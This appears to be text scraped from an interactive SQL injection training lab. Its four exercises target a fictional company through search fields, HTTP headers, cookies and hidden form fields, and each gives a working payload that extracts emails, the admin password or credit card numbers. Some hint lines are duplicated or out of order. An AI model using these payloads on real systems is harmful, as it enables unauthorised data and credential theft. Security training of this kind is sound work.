Real-World Attack Vectors
Injection surfaces are everywhere
Rolling Thunder Security · Module 05 · Lab 07
Beyond the Login Form
Most SQL injection tutorials only show login bypasses. In reality, injection surfaces lurk in every piece of user-controlled data that touches a database query. Developers often assume that certain inputs are "safe" because they are not directly typed by the user, but the browser sends them all the same.
Every one of these vectors has been exploited in real-world breaches:
▶ Search fields
▶ HTTP headers
▶ Cookie values
▶ Hidden form fields
▶ URL parameters
▶ JSON / XML APIs
▶ Dropdown menus
▶ User-Agent / Referer
Lab 1 of 4
Search Field Injection
Unsolved
Scenario: You have access to Acme Corp's internal knowledge base search. The search bar queries an
Key detail: Your input appears twice in the query (once for title, once for content). Your injection must account for both injection points.
articles table. Your goal: use the search to extract user email addresses from a completely different table.
Key detail: Your input appears twice in the query (once for title, once for content). Your injection must account for both injection points.
SELECT title, content FROM articles
WHERE title LIKE '%[YOUR INPUT]%'
OR content LIKE '%[YOUR INPUT]%'
Waiting for input...
Think about closing the first LIKE with
Try:
%', then using UNION SELECT to pull from the users table. Remember you need to handle the second injection point too. The second LIKE's opening '% needs to be commented out with --.
Try:
%' UNION SELECT username, email FROM users --
Lab 2 of 4
Header Injection
Unsolved
Scenario: Acme Corp logs every page visit to an
Key insight: The server trusts HTTP headers because "users can't edit them." But with any proxy tool (Burp Suite, browser DevTools), headers are fully controllable.
access_log table, storing the User-Agent header directly via string concatenation. Your goal: craft a malicious User-Agent to extract the admin password from the users table.
Key insight: The server trusts HTTP headers because "users can't edit them." But with any proxy tool (Burp Suite, browser DevTools), headers are fully controllable.
INSERT INTO access_log (page, user_agent, ip)
VALUES ('/dashboard', '[USER-AGENT]', '10.0.1.42')
GET
/dashboard HTTP/1.1
Host:
intranet.acmecorp.local
User-Agent:
Accept:
text/html, application/xhtml+xml
Cookie:
session=abc123def456
Waiting for input...
You need to close the VALUES clause, then start a new SELECT statement. The User-Agent value is inside single quotes, so close the quote first.
Try:
This closes the INSERT, then runs a separate SELECT to pull the admin password.
Try:
Mozilla/5.0', '10.0.1.42'); SELECT password FROM users WHERE username='admin' --
This closes the INSERT, then runs a separate SELECT to pull the admin password.
Lab 3 of 4
Cookie Monster
Unsolved
Scenario: Acme Corp's intranet uses a cookie called
Bonus challenge: After seeing all users, try a UNION-based injection to extract credit card numbers.
user_id to identify who is logged in. The cookie value is plugged directly into a SQL query with no parameterization. You are currently logged in as user 3. Your goal: extract all users' data by modifying the cookie.
Bonus challenge: After seeing all users, try a UNION-based injection to extract credit card numbers.
SELECT username, email, role FROM users
WHERE id = [COOKIE_VALUE]
Waiting for input...
Step 1: The cookie value is a number with no quotes around it. Use
Try:
Step 2 (bonus): Use a UNION to pull credit card data:
OR 1=1 to make the WHERE clause always true.
Try:
3 OR 1=1
Step 2 (bonus): Use a UNION to pull credit card data:
3 UNION SELECT card_number, card_holder, exp_date FROM credit_cards
Lab 4 of 4
The Hidden Field
Unsolved
Scenario: Acme Corp's product review form uses a hidden field
Key insight: Any user can open browser DevTools (F12), find hidden fields, and change their values. "Hidden" means invisible, not immutable.
product_id to track which product is being reviewed. Developers assumed hidden fields are safe because users "cannot see them." Your goal: inject through the hidden field to extract the admin password.
Key insight: Any user can open browser DevTools (F12), find hidden fields, and change their values. "Hidden" means invisible, not immutable.
INSERT INTO reviews (product_id, review_text, rating)
VALUES ([PRODUCT_ID], '[REVIEW]', 5)
Leave a Product Review
★★★★★
Waiting for input...
The
Try setting product_id to:
This makes the full query insert the admin password as the review_text.
product_id is a numeric field with no quotes. You can close the VALUES clause and inject a subquery.
Try setting product_id to:
1, (SELECT password FROM users WHERE username='admin'), 5) --
This makes the full query insert the admin password as the review_text.